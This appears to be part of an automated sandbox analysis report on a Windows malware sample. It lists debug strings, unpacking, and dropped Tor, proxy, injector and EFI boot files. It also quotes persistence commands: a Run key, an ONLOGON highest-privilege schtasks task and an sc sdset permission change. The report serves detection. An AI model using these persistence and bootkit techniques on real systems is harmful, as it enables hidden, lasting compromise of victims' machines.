Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 4.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 10.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 20.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 31.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 40.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 43.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 55.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 58.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Windows\rss\csrss.exe Unpacked PE file: 61.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\rss\csrss.exe Code function: 20_3_0C4841B0 push eax; retf 20_3_0C4841B1
Source: C:\Windows\rss\csrss.exe Code function: 20_3_0C4841B0 push eax; retf 20_3_0C4841B1
PE file contains sections with non-standard names
Source: injector.exe.20.dr Static PE information: section name: _RDATA
Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: section name: _RDATA
Source: zlib1.dll.20.dr Static PE information: section name: /4
Source: tor.exe.20.dr Static PE information: section name: /4
Source: tor-gencert.exe.20.dr Static PE information: section name: /4
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /4
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /14
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /29
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /41
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /55
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /67
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /78
Source: libwinpthread-1.dll.20.dr Static PE information: section name: /89
Source: libssp-0.dll.20.dr Static PE information: section name: /4
Source: libssp-0.dll.20.dr Static PE information: section name: /14
Source: libssp-0.dll.20.dr Static PE information: section name: /29
Source: libssp-0.dll.20.dr Static PE information: section name: /41
Source: libssp-0.dll.20.dr Static PE information: section name: /55
Source: libssp-0.dll.20.dr Static PE information: section name: /67
Source: libssp-0.dll.20.dr Static PE information: section name: /80
Source: libssp-0.dll.20.dr Static PE information: section name: /91
Source: libssp-0.dll.20.dr Static PE information: section name: /102
Source: libssl-1_1.dll.20.dr Static PE information: section name: /4
Source: libssl-1_1.dll.20.dr Static PE information: section name: /14
Source: libssl-1_1.dll.20.dr Static PE information: section name: /29
Source: libssl-1_1.dll.20.dr Static PE information: section name: /41
Source: libssl-1_1.dll.20.dr Static PE information: section name: /55
Source: libssl-1_1.dll.20.dr Static PE information: section name: /67
Source: libssl-1_1.dll.20.dr Static PE information: section name: /80
Source: libssl-1_1.dll.20.dr Static PE information: section name: /91
Source: libssl-1_1.dll.20.dr Static PE information: section name: /102
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /4
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /14
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /29
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /41
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /55
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /67
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /80
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /91
Source: libgcc_s_dw2-1.dll.20.dr Static PE information: section name: /102
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent_extra-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent_core-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /4
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /14
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /29
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /41
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /55
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /67
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /80
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /91
Source: libevent-2-1-7.dll.20.dr Static PE information: section name: /102
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /4
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /14
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /29
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /41
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /55
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /67
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /80
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /91
Source: libcrypto-1_1.dll.20.dr Static PE information: section name: /102
Source: proxy.exe.20.dr Static PE information: section name: .symtab
Source: bootmgfw.efi.20.dr Static PE information: section name: .xdata
Source: bootx64.efi.20.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.20.dr Static PE information: section name: .xdata
PE file contains an invalid checksum
Source: bootx64.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: csrss.exe.10.dr Static PE information: real checksum: 0x435435 should be: 0x4373eb
Source: bootmgfw.efi.20.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: EfiGuardDxe.efi.20.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: proxy.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x70e262
Source: kdsyitkxmS.exe Static PE information: real checksum: 0x435435 should be: 0x4373eb
Source: injector.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x54ea2

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub Jump to behavior
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\fodhelper.exe Executable created and started: C:\Windows\rss\csrss.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Drops PE files
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll Jump to dropped file
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\zlib1.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libwinpthread-1.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
